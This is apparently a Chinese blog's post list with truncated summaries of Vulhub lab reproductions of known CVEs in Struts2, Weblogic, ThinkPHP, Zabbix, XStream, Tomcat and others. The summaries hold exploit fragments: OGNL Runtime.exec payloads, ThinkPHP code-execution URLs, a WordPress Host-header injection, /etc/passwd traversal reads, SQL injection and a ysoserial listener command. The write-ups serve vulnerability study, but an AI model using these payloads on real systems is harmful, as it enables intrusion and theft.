自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(259)
  • 收藏
  • 关注

原创 Python报错ImportError: cannot import name ‘CREATE_NO_WINDOW‘

模块中 Windows 平台的一个常量,用于创建一个新的进程时隐藏新窗口。通常情况下该常量应该是可用的,但是如果你的 Python 版本比较老(例如 Python2.x),则可能会出现。这个常量在较新的 Python 版本(如 Python 3.7 或更高版本)中才可用。然而我的python版本为3.6.1,在 Python 3.6 的。我换个高级的版本就ok了,切换后版本为。是 Python 中。,事实证明是能导入的了。

2023-10-03 16:45:21 479

原创 【VulnHub靶场】Hackable: III

VulnHub靶机渗透测试

2022-11-08 12:37:05 1619 1

原创 Zabbix Server trapper命令注入漏洞(CVE-2020-11800)

漏洞简介Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix SIA zabbix3-proxy 3.0.31之前版本和zabbix3-server 3.0.31之前版本中存在安全漏洞。在CVE-2017-2824中,其Server端 trapper command 功能存在一处代码执行漏洞,而修复补丁并不完善,导致可以利用IPv6进行绕过,注入任意命令。漏洞复现修改CVE-2017-2824的PO

2021-08-21 16:12:08 1104

原创 Zabbix Server trapper命令注入漏洞(CVE-2017-2824)

漏洞简介Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。远程攻击者可利用该漏洞注入命令,执行代码。漏洞复现使用这个简单的POC来复现漏洞:import sysimport socketimport jsonimport sysdef send(ip, da

2021-08-21 15:53:58 1030

原创 zabbix latest.php SQL注入漏洞(CVE-2016-10134)

漏洞简介Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。 Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本中存在SQL注入漏洞。远程攻击者可借助latest.php文件中的‘toggle_ids’数组参数利用该漏洞执行任意SQL命令。漏洞复现访问http://your-ip:8080,用账号guest(密码为空)登录游客账户。登录后,查看Cookie中的zbx_sessionid,复

2021-08-21 15:22:34 433

原创 XXL-JOB executor 未授权访问漏洞

漏洞简介XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。影响范围XXL-JOB <= 2.2.0漏洞复现2.2.0版本可以直接向客户端发送如下数据包,即可执行命令:POST /run HTTP/1.1Host:

2021-08-21 15:06:57 729

原创 XStream 反序列化命令执行漏洞(CVE-2021-29505)

漏洞简介XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.16 及之前版本黑名单存在缺陷,攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求,进而执行任意命令。漏洞复现我们需要自己的服务器上使用ysoserial的JRMPListener启动一个恶意的RMI Registry:java -cp ysoserial-master-SNAPSHOT.jar ysoserial.exploit.JRMPListener 1099

2021-08-21 14:44:24 760

原创 XStream 反序列化命令执行漏洞(CVE-2021-21351)

漏洞简介XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。漏洞复现由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.

2021-08-21 14:35:21 1158 2

原创 Wordpress 4.6 任意命令执行漏洞(PwnScriptum)

漏洞详细详细务必请看:https://github.com/vulhub/vulhub/blob/master/wordpress/pwnscriptum/README.zh-cn.md漏洞复现发送如下数据包,可见/tmp/success已经成功创建:POST /wp-login.php?action=lostpassword HTTP/1.1Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}b

2021-08-21 13:38:05 484

原创 Webmin 远程命令执行漏洞(CVE-2019-15107)

漏洞简介Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。漏洞复现发送如下数据包,即可执行命令id:POST /password_change.cgi HTTP/1.1Host: your-ip:10000Accept-Encoding: gzip, deflate

2021-08-21 13:04:36 428

原创 Weblogic 常规渗透测试环境(文件读取漏洞)

简介本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。Weblogic版本:10.3.6(11g)Java版本:1.6弱口令:weblogicOracle@123复现操作接下来我们假设不知道弱口令,那我们怎么靠文件读取来getshell呢?本环境前台模拟了一个任意文件下载漏洞,访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成

2021-08-21 12:10:46 761

原创 Weblogic SSRF漏洞

漏洞简介Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。漏洞复现SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp,我们发送如下数据包:GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&a

2021-08-21 11:31:23 252

原创 Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)

漏洞简介CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。影响范围10.3.6.0.0版本, 12.1.3.0.0版本, 12.2.1.3.0版本, 12.2.1.4.0版本, 14.1.1.0.0版本漏洞复现首先测试权限绕过漏洞(CVE-2020-14882),访问以下URL,即可未授权

2021-08-18 13:42:51 586

原创 Weblogic 任意文件上传漏洞(CVE-2018-2894)

漏洞详细影响范围:Oracle WebLogic Server 10.3.6.0版本,12.1.3.0版本,12.2.1.2版本,12.2.1.3版本。详细请看:https://vulhub.org/#/environments/weblogic/CVE-2018-2894/漏洞复现访问http://your-ip:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/A

2021-08-18 12:55:10 277

原创 Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

漏洞简介Oracle WebLogic Server中的WLS核心组件存在远程代码执行漏洞。攻击者可通过远程发送攻击数据,借助T3协议在WebLogic Server中执行反序列化操作利用该漏洞执行代码。影响范围Oracle WebLogic Server 10.3.6.0版本,12.1.3.0 版本,12.2.1.2 版本,12.2.1.3版本。漏洞复现首先下载ysoserial,并启动一个JRMP Server:java -cp ysoserial.jar ysoserial.exploit

2021-08-18 11:16:52 523

原创 Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)

漏洞简介Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。影响范围Oracle WebLogic Server 10.3.6.0.0版本,12.1.3.0.0版本,12.2.1.1.0版本,12.2.1.2.0版本。漏洞复现发送如下数据包来反弹shell:POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: yo

2021-08-18 11:16:42 385

原创 uWSGI 未授权访问漏洞

漏洞简介uWSGI支持通过魔术变量(Magic Variables)的方式动态配置后端Web应用。如果其端口暴露在外,攻击者可以构造uwsgi数据包,并指定魔术变量UWSGI_FILE,运用exec://协议执行任意命令。漏洞复现我们使用POC来进行复现:python poc.py -u your-ip:8000 -c "touch /tmp/success"...

2021-08-18 11:16:24 251

原创 uWSGI PHP目录穿越漏洞(CVE-2018-7490)

漏洞简介uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。漏洞复现访问http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd,成功读取文件:...

2021-08-18 11:16:12 440

原创 Apache Unomi 远程表达式代码执行漏洞(CVE-2020-13942)

漏洞简介Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验。在Apache Unomi 1.5.1级以前版本中,存在一处表达式注入漏洞,远程攻击者通过MVEL和OGNL表达式即可在目标服务器上执行任意命令。漏洞复现通过8181和9443两个端口均可触发漏洞,以下以8181为例。通过MVEL表达式执行任意命令:POST /context.json HTTP/1.1Host:

2021-08-17 15:35:31 309

原创 Tomcat7+ 弱口令 && 后台getshell漏洞

漏洞简介详细请看:https://github.com/vulhub/vulhub/blob/master/tomcat/tomcat8/README.zh-cn.md漏洞复现访问tomcat管理界面:http://your-ip:8080/manager/html,账户密码均为tomcat我们还可以上传war包来getshell,首先准备个jsp木马,然后压缩成zip文件,最后从命名为war文件,上传文件后访问即可:其中shell目录为war文件的文件名...

2021-08-17 15:15:57 567

原创 Aapache Tomcat AJP 文件包含漏洞(CVE-2020-1938)

漏洞简介由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。影响范围7.0.100之前的7.*版本8.5.51之前的8.*版本9.0.31之前的9.*版本漏洞复现POC有很多,我这次使用这个POC:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfipython e

2021-08-17 14:58:13 315

原创 Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

漏洞原理原理请看:https://github.com/vulhub/vulhub/blob/master/tomcat/CVE-2017-12615/README.zh-cn.md漏洞复现直接发送以下数据包即可在Web根目录写入shell:PUT /1.jsp/ HTTP/1.1Host: your-ip:8080Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6

2021-08-17 14:36:38 180

原创 Tiki Wiki CMS Groupware 认证绕过漏洞(CVE-2020-15906)

漏洞详细Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。漏洞复现我们使用POC来进行复现,该POC先使用CVE-2020-15906绕过认证,获取管理员权限;再使用Smarty的沙盒绕过漏洞(CVE-2021-26119)

2021-08-17 14:20:16 713

原创 ThinkPHP5 SQL注入漏洞 && 敏感信息泄露

漏洞复现我们访问http://your-ip/index.php?ids[]=1&ids[]=2即可看到用户都没列举出来了存在该漏洞:访问http://your-ip/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1,可以看到爆出了许多信息:更多的利用方法还是自行寻找来的方便,在该环境中报错信息里面还包含了数据库的账户密码:...

2021-08-17 14:12:45 738

原创 ThinkPHP5 5.0.23 远程代码执行漏洞

漏洞简介ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。漏洞复现发送如下数据包即可执行id命令:POST /index.php?s=captcha HTTP/1.1Host: localhostAccept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: M

2021-08-17 13:56:54 369

原创 ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞详细ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。漏洞复现直接访问http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1,即可执行phpinfo:当

2021-08-17 13:52:22 324

原创 ThinkPHP 2.x 任意代码执行漏洞

漏洞详细详细请看:https://vulhub.org/#/environments/thinkphp/2-rce/漏洞复现直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行代码phpinfo():

2021-08-17 11:53:09 146

原创 Supervisord 远程命令执行漏洞(CVE-2017-11610)

漏洞简介Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。影响范围3.0.1之前的版本3.1.4之前的3.1.x版本3.2.4之前的3.2.x版本3.3.3之前的3.3.x版本漏洞复现发送以下数据包即可执行任意命令:POST /RPC2 HTTP/1.1Host: loca

2021-08-17 11:33:30 760

原创 S2-061 远程命令执行漏洞(CVE-2020-17530)

漏洞简介影响版本:Struts 2.0.0-Struts 2.5.25详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-061/README.zh-cn.md漏洞复现访问http://target-ip:8080/index.action查看到首页,发送如下数据包,即可执行id命令:POST /index.action HTTP/1.1Host: localhost:8080Accept-Encoding: gzip, d

2021-08-15 10:55:23 300 2

原创 S2-059 远程代码执行漏洞(CVE-2019-0230)

漏洞简介影响版本: Struts 2.0.0 - Struts 2.5.20详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-059/README.zh-cn.md漏洞复现我们用python来运行以下Poc,即可利用漏洞:import requestsurl = "http://127.0.0.1:8080"data1 = { "id": "%{(#context=#attr['struts.valueStack

2021-08-15 10:49:35 436

原创 S2-057 任意代码执行漏洞(CVE-2018-11776)

漏洞简介影响版本: <= Struts 2.3.34, Struts 2.5.16详细请看:https://vulhub.org/#/environments/struts2/s2-057/漏洞复现这次OGNL的解析在url上,我们可以先检验漏洞是否存在:http://your-ip:8080/struts2-showcase/$%7B233*233%7D/actionChain1.action可以看到访问后已经被执行了,当然在burp上更加能够体现!先放个POC:${(#dm=@

2021-08-13 11:52:44 254

原创 S2-053 远程代码执行漏洞

漏洞简介影响版本: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-053/README.zh-cn.md漏洞复现输入如下Payload即可成功执行命令(注意最后有换行):%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_membe

2021-08-13 11:27:58 265

原创 S2-052 远程代码执行漏洞

漏洞简介影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md漏洞复现访问http://your-ip:8080/orders.xhtml即可看到showcase页面,由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改o

2021-08-12 13:26:37 547

原创 S2-048 远程代码执行漏洞

漏洞简介影响版本: 2.0.0 - 2.3.32详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-048/README.zh-cn.md漏洞复现我用的是vulhub的环境,访问http://your_Ip:8080/integration/editGangster.action页面,触发OGNL表达式的位置是Gangster Name这个表单,在vulhub的文章中,作者改了S2-045的沙盒绕过的POC,直接将POC填入表单即

2021-08-12 12:35:59 262

原创 S2-046 远程代码执行漏洞(CVE-2017-5638)

漏洞简介影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-046/README.zh-cn.md漏洞复现与s2-045类似,但是输入点在文件上传的filename值位置,并需要使用\x00截断,改了下vulhub文章的脚本:import socketq = b'''------WebKitFormBo

2021-08-12 12:17:52 731

原创 S2-045 远程代码执行漏洞(CVE-2017-5638)

漏洞简介影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10详细请看:https://blog.csdn.net/u011721501/article/details/60768657漏洞复现发送以下数据包即可运行命令:POST / HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Int

2021-08-11 11:38:49 239

原创 S2-032 远程代码执行漏洞(CVE-2016-3081)

漏洞简介影响版本: Struts 2.3.20 - Struts Struts 2.3.28 (except 2.3.20.3 and 2.3.24.3)详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-032/README.zh-cn.md漏洞复现直接请求如下URL,即可执行id命令:http://your-ip:8080/index.action?method:%23_memberAccess%3d@ognl.OgnlCo

2021-08-11 11:19:55 424

原创 S2-016 远程代码执行漏洞

漏洞简介影响版本: 2.0.0 - 2.3.15详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md漏洞复现访问http://your-ip:8080/index.action?redirect:OGNL表达式即可执行OGNL表达式:执行命令:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#

2021-08-10 12:20:57 603 2

原创 S2-015 远程代码执行漏洞

漏洞简介影响版本: 2.0.0 - 2.3.14.2详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-015/README.zh-cn.md漏洞复现根据vulhub的环境,如name.action页面,在name处传入以下POC即可运行命令:${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getD

2021-08-10 12:00:05 399

原创 S2-013/S2-014 远程代码执行漏洞

漏洞简介影响版本: 2.0.0 - 2.3.14.1详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-013/README.zh-cn.md漏洞复现GET传入以下Poc即可执行命令:${(#_memberAccess["allowStaticMethodAccess"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java

2021-08-09 13:00:46 282

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除